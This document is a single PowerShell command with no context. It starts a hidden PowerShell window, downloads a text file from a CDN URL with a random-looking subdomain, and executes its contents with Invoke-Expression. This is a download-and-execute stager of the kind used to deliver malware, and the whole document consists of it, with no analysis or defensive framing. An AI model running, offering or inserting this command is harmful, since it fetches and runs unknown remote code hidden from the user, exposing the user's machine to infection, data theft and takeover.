powershell.exe -W Hidden -command $url = 'https://UTFJv6fun.b-cdn.net/CHNL/bt.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text